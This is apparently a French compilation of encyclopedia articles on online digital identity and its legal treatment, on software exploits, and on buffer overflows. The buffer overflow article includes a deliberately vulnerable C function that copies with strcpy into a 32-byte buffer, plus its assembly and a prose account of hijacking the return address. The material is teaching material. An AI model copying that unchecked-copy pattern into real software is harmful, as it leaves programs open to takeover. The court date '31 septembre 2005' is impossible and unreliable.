• (fr) Pôle ARESU de la DSI du CNRS (https:/ / aresu. dsi. cnrs. fr/ spip. php?rubrique154) : Étude sur les failles de sécurité des applications Web

• Portail de la sécurité informatique Identité numérique (Internet) 24 Identité numérique (Internet)

Pour les articles homonymes, voir identité numérique (homonyme). L'identité numérique peut être définie comme un lien technologique entre une entité réelle (la personne) et une entité virtuelle (sa ou ses représentation(s) numériques). Les réseaux sociaux et les blogs ont provoqué la prolifération des données personnelles sur le Web. Désormais, chaque utilisateur dispose et doit gérer [1] une véritable « identité numérique » constituée des informations qu'il a saisies dans ses profils, de ses contributions (par exemple dans les blogs) et des traces qu'il ou elle laisse sur les sites web visités… L'évolution d'internet offrant de plus en plus de services pour les particuliers, les entreprises et les gouvernements, amène irrévocablement à se poser la problématique de la sécurité de l'information et plus particulièrement des données personnelles. Les réponses à ces problématiques sont pluridisciplinaires et en particulier concernent les aspects : •• Techniques : technologies à mettre en œuvre pour gérer l'identité. • Psychologiques et sociaux : la projection de l'identité en ligne revêt des enjeux nouveaux, comme la demande de droit à l'oubli • Légaux : le droit se fondant sur les définitions de personnes physiques et morales, il a connu quelques adaptations pour renforcer la notion d'identité et son applicabilité dans l'ère du numérique[2],[3]. • Éducatifs : étant donné l'accès des plus jeunes aux technologies de l'information et de la communication et la permanence des traces laissées sur les réseaux, la prévention par la sensibilisation des utilisateurs [4],[5].

Enjeux de l'identité numérique

Un internaute français posséderait en moyenne 12 comptes numériques[] si on additionne les diverses adresses de messagerie, les réseaux sociaux et les comptes créés pour acheter ou vendre en ligne. Par ailleurs, l'usurpation d'identité pour accéder à internet est deux fois plus courante que celle faite hors internet. Les chiffres seraient de l’ordre de 400 000 et 200 000[] Cet état de fait qui peut être généralisé au niveau international a conduit, en 2009, des un Avatar (informatique) est une forme d'identité gouvernements à proposer un accord, la résolution de Madrid qui pointe l'urgence numérique d'édifier un ensemble de normes et de références dans ce domaine.

Dimension technique

Cet article ou cette section doit être recyclé. Une réorganisation et une clarification du contenu sont nécessaires. Discutez des points à améliorer en page de discussion.

Des technologies déjà présentes sur le marché peuvent et vont contribuer à établir un certain degré de confiance de la part des utilisateurs. Identité numérique (Internet) 25

Techniques et outils de protection • Des technologies d'authentification et d'authentification forte, voire de cryptologie peuvent être mises en œuvre. •• D'autres mécanismes peuvent aussi être utilisés tels que les techniques d'anonymisation, l'utilisation de pseudonymes, les technologies de transparence.

Travaux et recherches conduites sur l'identité numérique

Les thèmes de recherche Un certain nombre de travaux et recherches sont conduits sur l'identité numérique qui couvrent une variété de disciplines telles que: •• La sécurité •• Contrôle d'accès •• RFID • Authentification forte, et cryptologie •• Biométrie •• Reconnaissance des formes •• la fédération des identités •• la consolidation des bases de données contenant des informations personnelles •• OpenID •• Les normes et aspects légaux •• Les aspects psycho-sociaux et sociétaux

Les initiatives de recherche Archive Wikiwix Que faire ? • « Le programme Identites Actives » [6] ( [7] • [8] • ): Identites Actives est programme de la FING (Fédération Internet Nouvelles Générations) qui est particulièrement focalisée sur les usages. • FIDIS [9] (Future of Identity in the Information Society): FIDIS est un réseau d'excellence de la commission européenne. FIDIS a une approche pluridisciplinaire et couvre l'ensemble des aspects relatifs à l'identité numérique. • Prodoper [10] (PROtection des DOnnées PERsonnelles): Prodoper est un projet du CNRS qui aborde les questions renvoyant à la protection des libertés individuelles, des données personnelles, ou encore à l’impact des NTIC sur les libertés civiles

Projets gouvernementaux

En France Deux initiatives concurrentes semblent se dégager en faveur d'une signature numérique sécurisée pour les citoyens français[] : • Adoption par le sénat d'un projet de loi sur la carte d'identité biométrique devant proposer ce service : le titulaire de la carte peut installer sur celle-ci une deuxième puce support de sa signature numérique, pouvant jouer le rôle d'authentificateur sur les sites administratifs puis à terme sur les sites de commerce électronique. Suite aux navettes parlementaires et à la saisine du Conseil constitutionnel, la Loi n° 2012-410 du 27 mars 2012 relative à la protection de l'identité [11] a considérablement réduit les services offerts par ce document d'identité en matière numérique. • Relance par Le Ministère de l'Industrie et de l'Économie numérique d'un autre dispositif — baptisé Idénum — supporté par une mini-clé USB ou par la puce d'un mobile, capable d'identifier automatiquement l'utilisateur sur les sites partenaires d'Idénum. Moyennant la confirmation d'un mot de passe, l'identité de l'internaute est immédiatement vérifiée. Ce projet est toujours dans l'attente de la publication de l'étude de préfiguration d'un Identité numérique (Internet) 26

consortium Idénum[12].

Institutions et autres projets

En France • CNIL (Commission nationale de l'informatique et des libertés): autorité de contrôle française en matière de protection des données personnelles. • Internet Sans Crainte [13]: Internet Sans Crainte est une initiative financée par la commission européenne visant à informer le citoyen des risques associés à l'identité en ligne, en particulier pour les enfants et les adolescents. • Association Présaje [14]. Travaux menés sur les aspects juridiques de l'identité numérique.: Ouvrage collectif: "L'identité à l'ère numérique" [15]. • Association francophone des spécialistes de l'investigation numérique: l'AFSIN, association francophones des spécialistes de l'investigation numérique est une association loi de 1901 fondée en octobre 2006 par des magistrats, des enquêteurs et des experts judiciaires pour favoriser les échanges en langue française sur les sujets relatifs à l'investigation numérique.

Dimension psychologique et sociale

L'identité en ligne (l'exposition de soi) Article connexe : Gestion de l'impression. Le Web social et en particulier l'arrivée du réseautage social en ligne, des Blogs, de la mise en ligne sur YouTube, de l'usage de WebCams [16] ont permis aux individus de se définir une identité en ligne ; Celle-ci reflétant plus ou moins, dans ce contexte, la façon dont ceux-ci sont perçus par les autres. Les mises en œuvre de l'identité numérique sont diverses : par exemple • un individu peut utiliser son profil pour se décrire, éventuellement tenter de bâtir une image favorable auprès des autres, •• un autre va souhaiter s'extérioriser à travers ses projets ou ses contributions à un projet, • un troisième emprunte -via un avatar- la personnalité d'un personnage dans un monde virtuel. On dénombre au moins cinq modalités de mise en œuvre des identités sur internet[17] Une cyberidentité est appréciée par autrui, via : • La présentation de l'individu par lui-même (self-présentation) • L'observation des traces numériques d'usage et comportements de l'individu (par exemple le niveau de qualité, ou de collaborativité de ses contributions, illustrations, apports…) • La « réputation » de l'individu et son statut (par exemple, dans le cas de Wikipédia, le système des lauriers (Barnstars) [18] fournit un moyen d'avoir accès au jugement des autres). Parmi les motivations à se définir en ligne, figurent :[réf. nécessaire]: •• L'utilité de se présenter pour mieux communiquer, ou trouver des internautes ayant des compétences ou centre d'intérêts proches ou complémentaires ; • Le narcissisme et le désir d'attirer l'attention [19] •• Le désir d'augmenter sa visibilité et donc son capital social. Ces motivations permettent de comprendre l'expansion des réseaux sociaux (communautés virtuelles). Identité numérique (Internet) 27

Manipulation ou correction de l'identité numérique Afin d'améliorer une notoriété en ligne, des agences proposent désormais à leurs clients d'examiner leur cyber-réputation et de la corriger. Leur travail consiste à reléguer le plus loin possible dans les pages recherchées les informations pouvant nuire, et positionner des informations de nature beaucoup plus positive partout sur internet grâce à des techniques de baronnages sur les réseaux sociaux. L'identité affichée en ligne n'est pas forcément ni l'identité réelle, ni toujours la même. Au contraire, la capacité à assumer des identités différentes est l'un des principaux attraits de l'identité numérique. Par exemple, des études ont montré que les participants dans les sites web de rencontres déformaient souvent la réalité à leur avantage[20],[21]. Certaines sociétés proposent même de vendre des 'amis' à ajouter aux accointances de manière à augmenter sa visibilité [22].

Dimension légale

Informatique et libertés Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [23] est la bienvenue !

L’usurpation d’identité Aussi étonnant que cela puisse paraître, l’usurpation d’identité a, pendant longtemps été ignorée en tant que telle par le législateur. Aucune loi ne punissait directement l'usurpation d'identité sur Internet. L’OCDE a publié fin mars 2009 un rapport intitulé Online Identity Theft montrant que la plupart des pays occidentaux ne disposent pas d'une législation spécifique réprimant le vol d'identité. Ce n'est que très récemment que l'infraction d'usurpation d'identité a été sanctionnée en tant que telle, depuis l'adoption de la Loi n°2002-1094 du 29 août 2002 d'orientation et de programmation pour la performance de la sécurité intérieure [24], dite Loppsi, dont la dernière réforme a été opérée par la loi n° 2011-267 du 14 mars 2011 d'orientation et de programmation pour la performance de la sécurité intérieure [25], donnant naissance à la Loppsi 2. Cette dernière modification vient sanctionner pénalement l'usurpation d'identité sur internet[26] inséré dans le code pénal à l' article 226-4-1 [27].

Sanctions pénales En France, le délit d'usurpation d'identité n'était directement sanctionné que dans un cas : le fait de prendre le nom d'un tiers. En effet, l’ article 434-23 du Code pénal [28] punit « le fait de prendre le nom d’un tiers, dans des circonstances qui ont déterminé ou auraient pu déterminer contre celui-ci des poursuites pénales [ … ]. Dans ce cas, elle est punie de 5 ans d'emprisonnement et de 75 000 euros d'amende. » L’application de cet article est subordonnée à l’existence de conséquences pénales à l’égard de la personne usurpée, ce qui est très restrictif. L'usurpation d'identité n'était pas un délit pénal en elle-même. Ainsi, envoyer un courriel en se faisant passer pour quelqu’un d’autre n’est pas en tant que tel punissable. En revanche, dans d’autres cas très particuliers, comme le fait d'utiliser une fausse identité dans un acte authentique ou un document administratif destiné à l'autorité publique ( article 433-19 du Code pénal [29]), prendre un faux nom pour se faire délivrer un extrait de casier judiciaire ( article 433-19 du Code pénal [29]), ou récupérer des identifiants et des mots de passe afin de vider le compte d’un client d’une banque, seront considérés comme répréhensibles. Ainsi, le 31 septembre 2005, le Tribunal de grande instance de Paris avait jugé Robin B. coupable de contrefaçon pour avoir réalisé un site internet personnel imitant la page d’enregistrement à Microsoft Messenger invitant les internautes à lui fournir leurs données personnelles à une adresse électronique qu’il avait créée. L’ article 434-23 du Code pénal [28] joue dans le seul cas où la constitution du délit tient à ce que ait été pris « le nom d'un tiers ». Le droit pénal est d'interprétation stricte : aussi, les juges pourraient refuser cette assimilation. Identité numérique (Internet) 28

L'usurpation d'identité est sanctionnée indirectement, au travers de l'atteinte à des données personnelles, de l'escroquerie, de la contrefaçon de marque, de l'atteinte à un système automatisé de traitement de données. En d’autres termes, l’usurpation d’identité est une composante d’infraction et non une infraction en tant que telle. Ainsi, l’ article 434-23 du Code pénal [28] vient prendre sa place aux côtés de l’escroquerie et de la contrefaçon dans l’arsenal répressif de ce comportement. Les textes répressifs étant par principe d’interprétation stricte, il est toujours possible que dans un cas précis les agissements analysés échappent à toute sanction. Néanmoins, le droit français paraît donc aujourd’hui doté de trois outils distincts au moins : les textes prévoyant et réprimant la contrefaçon, l’usurpation d’identité et l’escroquerie, pour lutter contre le phishing. La qualification d’escroquerie paraît répondre également assez nettement au souci de répression : l’ article 313-1 du Code pénal [30] la définit en effet notamment comme l’usage d’un faux nom ou d’une fausse qualité dans le but de tromper une personne physique ou morale et de la déterminer à son préjudice ou au préjudice d’un tiers, à remettre des fonds, des valeurs ou un bien quelconque, ou encore à fournir un service ou à consentir un acte opérant obligation ou décharge. Dans d’autres cas, l’usurpateur se fera passer pour quelqu’un d’autre dans un espace public. La loi de 1881 sur la presse sera applicable. Enfin, on peut imaginer le dévoilement de données à caractère personnel dans le cadre d’une usurpation d’identité. Dans ce cas là, la loi du 6 janvier 1978 s’appliquera. Désormais, « Le fait d’usurper l’identité d’un tiers ou une ou plusieurs données de toute nature permettant de l’identifier en vue de troubler sa tranquillité ou celle d’autrui, ou de porter atteinte à son honneur ou à sa considération ou ses intérêts, est puni d'un an d’emprisonnement et de 15 000 euros d’amende. Cette infraction est punie des mêmes peines lorsqu’elle est commise sur un réseau de communication électronique ouverte au public. »[].

Sanctions de droit commun Au delà de l’aspect pénal, l’usurpation d’identité présente également un aspect civil. Chacun peut aussi faire sanctionner l'atteinte à son nom ou à d'autres éléments de sa personnalité, ou encore obtenir le remboursement des sommes dépensées par celui qui a utilisé les données de sa carte bancaire frauduleusement. Une femme a été indemnisée de son préjudice causé par une collègue qui utilisait son identité et ses coordonnées téléphoniques sur Meetic, où elle la faisait passer pour « une femme facile, désireuse de relations sexuelles »[31]. Tant le nom que le pseudonyme sont civilement protégé contre les usurpations. L’ article 1382 du Code civil [32] qui fonde la responsabilité civile est particulièrement applicable à ces cas. Pour ce faire, l’usurpation d’identité doit être caractérisée par une réponse positive aux trois critères suivants : • l'existence d'une faute (l’utilisation d’un pseudonyme de manière trompeuse par exemple, en se faisant passer pour quelqu’un de connu) ; • l'existence d'un préjudice (le titulaire de l’identité doit subir un préjudice du fait de la faute commise par l’usurpateur) ; •• la preuve du lien de causalité entre la faute et le préjudice évoqués. L' article 1382 du Code civil [33] peut jouer également si l’usurpateur dévoile des aspects de la vie privée de la personne dont il a pris l’identité. Les sanctions existantes sont considérées comme insuffisantes au regard du développement considérable de l'usurpation d'identité. La ministre de l'Intérieur, Michèle Alliot-Marie, a annoncé, le 24 mars 2009, que l'usurpation d'identité sur Internet serait mieux sanctionnée : « Usurper l’identité d’autrui par courrier est interdit par la loi. Ce n’est pas le cas pour l’usurpation d’identité sur Internet. Et pourtant, la diffusion sur Internet est plus large que celle que peut connaître le courrier. » La nouvelle incrimination figure dans le projet de loi de programmation et de performance pour la sécurité intérieure (Lopsi). Des sénateurs avaient auparavant proposé, en 2005 puis en 2008, que soit créée une infraction pénale spécifique sans que leur proposition ne soit débattue, estimant que l’arsenal existant, principalement l’ article 434-23 du Code pénal [28], était suffisant[34],[35],[36],[37]. Identité numérique (Internet) 29

Dimension éducative

Cet article ou cette section relève du guide pratique, ce qui n'est pas de nature encyclopédique. [23] Vous pouvez reformuler les passages concernés , ou remplacer ce bandeau soit par {{pour Wikilivres}} (ou {{pour Wikibooks}}), {{pour Wikiversité}}, ou {{Pour Wikivoyage}}, afin de demander le transfert vers un projet frère plus approprié.

Les enjeux : pourquoi en parler à l'école [38]? Le réseau web est un réseau public: Comment gérer des informations qui sont susceptibles d'être vues par n’importe quel utilisateur ? Certaines fonctionnalités offrent une protection ou un filtrage d'accès à certaines informations dont l'accès devient restreint à une catégorie ou liste nominative d'individus. Voir par exemple le système de sécurité facebook [39]. Les élèves doivent être avertis qu’il faut être vigilant en ce qui concerne la publication de photos ou de vidéos qui peuvent être préjudiciables pour eux et leur avenir. Il arrive fréquemment qu’un chef d’entreprise consulte le profil d’un candidat demandeur d’emploi avant de l’embaucher. C’est pourquoi, bon nombre de personnes veillent désormais à leur « e-réputation ». Il ne suffit pas de supprimer une publication pour qu’elle disparaisse du Web, contrairement à ce que croient les élèves, car celles-ci peuvent avoir été sauvegardés par des internautes sur leur ordinateur local. C’est aussi le cas des chaînes de solidarité par courriels qui perdurent bien après la disparition de la cause à défendre. Le but est de sensibiliser les élèves sur la question de l’identité numérique, les enjeux et les conséquences qu’elle engendre, sans forcément leur faire la morale. Il est important qu’ils maîtrisent leur identité numérique et qu’ils développent leur sens critique et leur attitude civique face à l’Internet afin que l’identité de chacun soit préservée.

Comment en parler à l'école ? Dans un premier temps, il s’agit pour l’enseignant de partir des connaissances propres et des pratiques des élèves. Il est vrai que l’identité numérique est un sujet difficile à aborder en classe car cette question touche l’intimité de chacun. Il est possible ainsi d’ouvrir avec eux un débat sur cette question. Il faut également s’adapter à l’hétérogénéité des élèves : leur âge, leurs dispositions matérielles personnelles et leurs compétences informatiques. Il existe des précautions à prendre : prendre garde à ne pas juger l’élève tout en lui expliquant les risques qu’il encourt, faire attention à ne pas dramatiser les situations numériques que peuvent rencontrer les élèves dans leur utilisation de l’outil informatique. L’enseignant peut profiter d’un contexte pédagogique pour aborder cette question. Il ne faut pas hésiter par exemple, à leur donner des informations objectives et complètes qui les guidera dans leur utilisation du web. L’enseignant doit être garant du savoir qu’il transmet et ainsi être certain de la véracité de ses propos. Il doit se positionner en tant qu’expert. Cependant, attention à ne pas imposer ses opinions vis-à-vis d’Internet. Il peut être intéressant de se baser sur un exemple concret de la vie quotidienne de l’élève de façon à faire naître et à développer en lui un comportement éthique et responsable sur la toile. L’élève doit prendre conscience qu’il reste le même individu aussi bien dans un environnement virtuel que dans la vie réelle. Transcrire les réseaux sociaux dans la vie réelle est une des méthodes que l’on peut utiliser pour cerner les enjeux de l’identité numérique. On peut questionner les élèves sur leurs représentations des réseaux sociaux et leur demander de les mettre en scène sous la forme de petits sketchs. Par ce biais, les élèves pourront comprendre que les réseaux sociaux virtuels appellent des comportements spécifiques et non adaptés à la réalité. Par exemple, croiser un inconnu dans la rue et lui demander : « Est-ce que tu veux être mon ami ? ». Afin de faire prendre conscience des dangers éventuels de l’utilisation d’Internet, il est possible de proposer aux élèves une utilisation réfléchie de l’outil informatique (notamment des réseaux sociaux comme Facebook ou Twitter). Le but est de leur apprendre à utiliser ces outils sans pour autant dévoiler leur identité numérique. On peut Identité numérique (Internet) 30

leur montrer comment régler les paramètres de sécurité des documents mis en ligne. Dans cet objectif les enfants pourraient créer une page Facebook pour la classe où ils publieraient des documents liés à leurs activités scolaires, au projet de l’école, etc. En parallèle, on peut aussi aborder l’idée de traces (les informations déposées sur Internet, restent en mémoire sur le serveur) et leur faire collecter des données personnelles (photos, vidéos, etc.) pour constater qu’il est facile d’utiliser ces informations à bon ou mauvais escient.

Notes

[1] Cultivez votre identité numérique (http:/ / issuu. com/ geemik/ docs/ cultivez_votre_identite_numerique_v1. 2), livre électronique, avril 2009 (lien vers l'interface de consultation de Flash) [2][2], présente dix scénarios pour la maîtrise juridique de son identité sur Internet

[4] cf. par exemple le travail de l'association ' Internet Sans Crainte (http:/ / www. internetsanscrainte. fr/ )' [5][5]Contribution du CLEMI à un Dossier pédagogique de 64 pages avec des fiches pédagogiques généralistes

[6] http:/ / www. identitesactives. net/

[7] http:/ / web. archive. org/ web/ */ http:/ / www. identitesactives. net/

[8] http:/ / archive. wikiwix. com/ cache/ ?url=http:/ / www. identitesactives. net/

[9] http:/ / www. fidis. net/

[10] http:/ / www. prodoper. fr/

[11] http:/ / www. legifrance. gouv. fr/ WAspad/ UnTexteDeJorf?numjo=IOCX1115403L

[13] http:/ / www. internetsanscrainte. fr/

[14] Institut Présaje (http:/ / www. presaje. com/ )

[15] G. Desgens-Pasanau et E. Freyssinet, "L'identité à l'ère numérique" (http:/ / www. identitenumerique. eu/ ), préface de F. Ewald, publié chez Dalloz, septembre 2009, .

[16] Anne Cauquelin (2003). L'Exposition de soi : Du journal intime aux Webcams (http:/ / books. google. fr/ books?id=Tt_hPQAACAAJ), Collection Fenêtres sur, Eshel 2003

[17] Cours "identités numérique" (http:/ / rb. ec-lille. fr/ l/ Cours_de_sociologie_des_organisations. htm) en licence creative commons

[23] http:/ / fr. wikipedia. org/ w/ index. php?title=Identit%C3%A9_num%C3%A9rique_(Internet)& action=edit

[24] http:/ / www. legifrance. gouv. fr/ WAspad/ UnTexteDeJorf?numjo=INTX0200114L

[25] http:/ / www. legifrance. gouv. fr/ WAspad/ UnTexteDeJorf?numjo=IOCX0903274L

[27] http:/ / www. legifrance. gouv. fr/ WAspad/ UnArticleDeCode?code=CPENALLL. rcv& art=226-4-1

[28] http:/ / www. legifrance. gouv. fr/ WAspad/ UnArticleDeCode?code=CPENALLL. rcv& art=434-23

[29] http:/ / www. legifrance. gouv. fr/ WAspad/ UnArticleDeCode?code=CPENALLL. rcv& art=433-19

[30] http:/ / www. legifrance. gouv. fr/ WAspad/ UnArticleDeCode?code=CPENALLL. rcv& art=313-1 [31][31]Tribunal correctionnel de Carcassonne, 16 juin 2006

[32] http:/ / www. legifrance. gouv. fr/ WAspad/ UnArticleDeCode?code=CCIVILL0. rcv& art=1382

[33] http:/ / www. legifrance. gouv. fr/ WAspad/ UnArticleDeCode?code=CCIVILL0. rcv& art=9 [36] Forum des droits sur Internet, Projet de loi d’orientation et de programmation pour la performance de la sécurité intérieure [archive], 25 juin 2009

[38] CNDP: En parler aux élèves : pourquoi ? (http:/ / www. cndp. fr/ savoirscdi/ societe-de-linformation/ reflexion/

identite-numerique-quels-enjeux-pour-lecole/ en-parler-aux-eleves-pourquoi. html)

[39] Politique de confidentialité sur facebook (http:/ / www. facebook. com/ policy. php). 31

2-Attaque, fraude, analyse et cryptanalyse 32

2.1-Application

Exploit (informatique)

Pour les articles homonymes, voir Exploit. Un exploit[1] est, dans le domaine de la sécurité informatique, un élément de programme permettant à un individu ou un logiciel malveillant d'exploiter une faille de sécurité informatique dans un système d'exploitation ou dans un logiciel que ce soit à distance, remote exploit, ou sur la machine sur laquelle cet exploit est exécuté, local exploit ; ceci, afin de prendre le contrôle d'un ordinateur ou d'un réseau, de permettre une augmentation de privilège d'un logiciel ou d'un utilisateur, ou d'effectuer une attaque par déni de service. Le terme provient de l'anglais exploit, "exploiter" (ici une faille de sécurité). L'usage est de le prononcer à l'anglaise « explo-ï-te » et non « exploi » comme en français [1].

Historique Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [2] est la bienvenue !

Mode opératoire Certains sites web piégés contiennent une ou plusieurs iframes (d'un pixel de large), pointant vers un ou plusieurs autres sites web contenant des exploits. Ces derniers exploitent alors des failles de sécurité éventuelles du navigateur ou des logiciels installés sur l'ordinateur, afin de télécharger et d'exécuter le fichier à l'origine de l'infection sur la machine de l'utilisateur. Les sites web les plus concernés sont les sites de cracks, de warez ou pornographiques[3]. La plupart des clients de messagerie pouvant aussi lire les contenus en HTML, les courriels contenant des exploits sont également un vecteur privilégié par les spammeurs ; de plus, cela leur permet de cibler une grande audience avec peu de dépenses Parfois, plusieurs exploits sont utilisés pour tester les failles éventuelles, car les développeurs corrigent régulièrement les failles de leurs logiciels. Les attaques doivent donc devenir plus sophistiquées elles aussi, par exemple en exploitant simultanément les failles de plusieurs logiciels installés sur l'ordinateur. Le ver Stuxnet utilise cette méthode[4]. Certains spams emploient plusieurs exploits pour augmenter les chances que leurs attaques soient fructueuses[5]. La plupart des logiciels contiennent ou ont contenu des failles. Ces failles peuvent être découvertes par les développeurs eux-mêmes ou par des hackers. Il existe un marché noir, sur lequel sont notamment vendus des « kits d'exploits »[6]. Certains sites proposent des exploits sans charges[7], pour des raisons de transparence et pour lutter contre la mentalité de la sécurité par l'obscurité chez les développeurs de logiciels propriétaires. Les logiciels populaires, par exemple Flash Player, Java, Adobe Reader, Windows Media et MS Office, sont une cible privilégiée de ce genre d'attaque[]. Exploit (informatique) 33

Types Les exploits peuvent être classifiés par le type de faille qu'ils utilisent. Voici quelques-unes des failles les plus couramment exploitées : • dépassement de tampon (buffer overflow) ; • dépassement de tas (heap overflow) ; • dépassement d'entier ; • dépassement de pile ; • return-to-libc attack ; • format string attack ; • situation de compétition (race condition) ; • injection de code (code injection) ; • injection SQL ; • cross-site scripting (XSS) ; • Remote File Inclusion (RFI).

Exemples Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [2] est la bienvenue !

Prévention et protection Le système d'exploitation et les logiciels doivent être mis à jour régulièrement par l'utilisateur, car la simple présence d'un logiciel non à jour peut suffire pour infecter l'ordinateur[].

Notes et références

[1] Ce mot anglais est un faux-ami du mot français exploit. Il doit plutôt être rapproché du verbe exploiter, puisque ce type de logiciel exploite une faille de sécurité.

[2] http:/ / fr. wikipedia. org/ w/ index. php?title=Exploit_(informatique)& action=edit

[7] http:/ / bugspy. net/ exposer/ Dépassement de tampon 34 Dépassement de tampon

En informatique, un dépassement de tampon ou débordement de tampon (en anglais, buffer overflow) est un bug par lequel un processus, lors de l'écriture dans un tampon, écrit à l'extérieur de l'espace alloué au tampon, écrasant ainsi des informations nécessaires au processus. Lorsque le bug se produit non intentionnellement, le comportement de l'ordinateur devient imprévisible. Il en résulte souvent un blocage du programme, voire de tout le système. Le bug peut aussi être provoqué intentionnellement et être exploité pour violer la politique de sécurité d’un système. Cette technique est couramment utilisée par les pirates. La stratégie de l'attaquant est alors de détourner le programme bugué en lui faisant exécuter des instructions qu'il a introduites dans le processus.

Utilisation malveillante et contre-mesures Le principe de l'utilisation malveillante du dépassement de tampon est de profiter de l’accès à certaines variables du programme, souvent par le biais de fonctions telles que scanf() (analyse d'une chaîne de caractères) ou strcpy() (copie d'une chaîne de caractères) en langage C, qui ne contrôlent pas la taille de la chaîne à traiter, afin d’écraser la mémoire du processus jusqu’à l’adresse de retour de la fonction en cours d’exécution. L'attaquant peut ainsi choisir quelles seront les prochaines instructions exécutées par le processus et faire exécuter un code malveillant qu'il aura introduit dans le programme. Afin d’éviter ces dépassements, certaines fonctions ont été réécrites pour prendre en paramètre la taille du tampon dans lequel les données sont copiées, et éviter ainsi de copier des informations à l'extérieur du tampon. Ainsi strncpy() est une version de strcpy() qui tient compte de la taille du tampon. La fonction strncpy présente l'inconvénient de remplir toute la fin du tampon de zéros, ce qui la rend moins efficace. Les fonctions strlcpy et strlcat, qui ne présentent pas ce défaut, ont été initialement disponibles sous OpenBSD et elles tendent à se répandre dans divers logiciels comme rsync et KDE.

Détails techniques sur architecture x86 (Intel) Un programme en exécution (un processus) découpe la mémoire adressable en zones distinctes : •• la zone de code où sont stockées les instructions du programme en cours ; •• la zone des données où sont stockées certaines des données que manipule le programme ; • la zone de la pile d'exécution ; • la zone du tas. Contrairement aux deux premières, les deux dernières zones sont dynamiques, c'est-à-dire que leur pourcentage d'utilisation et leur contenu varient tout au long de l’exécution d’un processus. La zone de la pile d'exécution est utilisée par les fonctions (stockage des variables locales et passage des paramètres). Elle se comporte comme une pile, c'est-à-dire dernier entré, premier sorti. Les variables et les paramètres d’une fonction sont empilés avant le début de la fonction et dépilés à la fin de la fonction. Une fonction est une suite d'instructions. Les instructions d'une fonction peuvent être exécutées (en informatique, on dit que la fonction est appelée) à partir de n'importe quel endroit d'un programme. À la fin de l'exécution des instructions de la fonction, l'exécution doit se continuer à l'instruction du programme qui suit l'instruction qui a appelé la fonction. Pour permettre le retour au programme qui a appelé la fonction, l’instruction d'appel de la fonction (l'instruction call) enregistre l'adresse de retour dans la pile d'exécution. Lors de l’exécution de l’instruction ret qui marque la fin de la fonction, le processeur récupère l’adresse de retour qu’il a précédemment stockée dans la pile d'exécution et le processus peut continuer son exécution à cette adresse. Dépassement de tampon 35

Plus précisément, le traitement d'une fonction inclut les étapes suivantes : 1. l'empilage des paramètres de la fonction sur la pile d'exécution (avec l'instruction push) ; 2. l'appel de la fonction (avec l'instruction call) ; cette étape déclenche la sauvegarde de l’adresse de retour de la fonction sur la pile d'exécution ; 3.3.le début de la fonction qui inclut : 1.1.la sauvegarde de l'adresse de la pile qui marque le début de l'enregistrement de l'état actuel du programme, 2.2.l'allocation des variables locales dans la pile d'exécution ; 4.4.l'exécution de la fonction ; 5.5.la sortie de la fonction qui inclut la restauration du pointeur qui marquait le début de l'enregistrement de l'état du programme au moment de l'appel de la fonction, 6. l'exécution de l’instruction ret qui indique la fin de la fonction et déclenche la récupération de l’adresse de retour et le branchement à cette adresse.

Illustration Soit l’extrait de programme C suivant (volontairement simplifié) :

#include #include

void foo(char *str) { char buffer[32]; strcpy(buffer, str); /* ... */ } int main(int argc, char *argv[]) { if (argc > 1) { /* appel avec le premier argument de la ligne de commandes */ foo(argv[1]); } /* ... */ return 0; }

Ce qui est traduit ainsi par un compilateur C (ici le compilateur GCC avec architecture x86) :

push ebp ; entrée de la fonction mov ebp,esp ; sub esp,40 ; 40 octets sont « alloués » (32 + les 2 variables qui serviront ; à l'appel de strcpy)

mov eax,[ebp+0x8] ; paramètre de la fonction (str) mov [esp+0x4],eax ; préparation de l'appel de fonction : deuxième paramètre lea eax,[ebp-0x20] ; ebp-0x20 contient la variable locale 'buffer' mov [esp],eax ; premier paramètre call strcpy ; sortie de la fonction Dépassement de tampon 36

leave ; équivalent à mov esp,ebp et pop ebp ret

Voici l'état de la pile d'exécution et des deux registres (ebp et esp) juste avant l'appel de la fonction strcpy :

État de la pile avant l'appel à la fonction strcpy

La fonction strcpy copiera le contenu de str dans buffer. La fonction strcpy ne fait aucune vérification : elle copiera le contenu de str jusqu'à ce qu'elle rencontre un caractère de fin de chaîne (caractère nul). Si str contient plus de 32 octets avant le caractère nul, la fonction strcpy continuera à copier le contenu de la chaîne au-delà de la zone allouée par la variable locale buffer. C’est ainsi que les informations stockées dans la pile d'exécution (incluant l’adresse de retour de la fonction) pourront être écrasées comme indiqué dans l'illustration suivante : Dépassement de tampon 37

Dépassement de tampon : la fonction strcpy copie la chaîne vers la zone mémoire indiquée, dépasse la zone allouée et écrase l'adresse de retour de la fonction foo

Dans l’exemple précédent, si str contient un code malveillant sur 32 octets suivi de l’adresse de buffer, au retour de la fonction, le processeur exécutera le code contenu dans str. Pour que cette « technique » fonctionne, il faut deux conditions : •• le code malveillant ne doit contenir aucun caractère nul, sans quoi strcpy() arrêtera sans copier les octets suivants le caractère nul ; •• l'adresse de retour ne doit pas non plus contenir de caractère nul. Le dépassement de tampon avec écrasement de l'adresse de retour est un bug du programme. L’adresse de retour ayant été écrasée, à la fin de la fonction, le processeur ne peut brancher vers l'adresse de retour originale, car cette adresse a été modifiée par le dépassement de tampon. Dans le cas d'un bug involontaire, l'adresse de retour a généralement été remplacée par une adresse en dehors de la plage adressable et le programme plante en affichant un message d’erreur (erreur de segmentation). Un hacker peut utiliser ce comportement à ses fins. Par exemple, en connaissant la taille du tampon (dans l’exemple précédent 32 octets), il peut écraser l’adresse de retour pour la remplacer par une adresse qui pointe vers un code à lui, de manière à prendre le contrôle du programme. De cette façon, il obtient les droits d’exécution associés au programme qu'il a détourné et peut dans certains cas accéder à des ressources critiques. Dépassement de tampon 38

La forme d’attaque la plus simple consiste à inclure dans une chaîne de caractères copiée dans le tampon un programme malveillant et d'écraser l'adresse de retour par une adresse pointant vers ce code malveillant. Pour arriver à ses fins, l'attaquant doit surmonter deux difficultés : •• trouver l'adresse de début de son code malveillant dans le programme attaqué ; • construire son code d’exploitation en respectant les contraintes imposées par le type de variable dans lequel il place son code (dans l'exemple précédent, la variable est une chaîne de caractères).

